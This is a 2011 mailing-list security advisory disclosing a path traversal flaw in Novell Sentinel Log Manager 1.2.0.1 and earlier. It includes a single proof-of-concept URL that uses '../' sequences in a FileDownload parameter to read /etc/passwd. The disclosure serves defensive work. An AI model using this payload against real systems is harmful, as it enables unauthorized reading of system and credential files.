[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAP-1Xubm7C1EsEQiPKe37DqHc41v3d8xs065sGreO99R=D3VNg@mail.gmail.com>
Date: Sun, 18 Dec 2011 16:25:14 +0100
From: Andrea Fabrizi <andrea.fabrizi@...il.com>
To: websecurity@...appsec.org, bugtraq@...urityfocus.com,
webappsec@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Novell Sentinel Log Manager <=1.2.0.1 Path
Traversal
**************************************************************
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@...il.com
Web: http://www.andreafabrizi.it
**************************************************************
The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.
Testing environment: Sentinel Log Manager Appliance 1.2.0.1
Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists